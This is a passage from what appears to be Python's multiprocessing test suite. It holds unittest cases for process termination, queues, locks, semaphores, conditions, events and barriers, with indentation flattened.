self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shut down until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.time()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.time() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platforms as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on macOS
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
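# Worker used by the notify tests: signal that it is sleeping, wait on the
# condition (optionally with a timeout), then signal that it has woken.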
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily: due to API shear this does not
# work with threading._Event objects (is_set == isSet).
self.assertEqual(event.is_set(), False)
# Removed: threading.Event.wait() returns the value of __flag
# instead of None (API shear with the semaphore-backed mp.Event).
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
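# View the shared buffer as an array of C ints; element 0 holds the length.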
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
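# Each child records its pid before and after running f, then waits until
# do_finish() allows it to exit.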
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
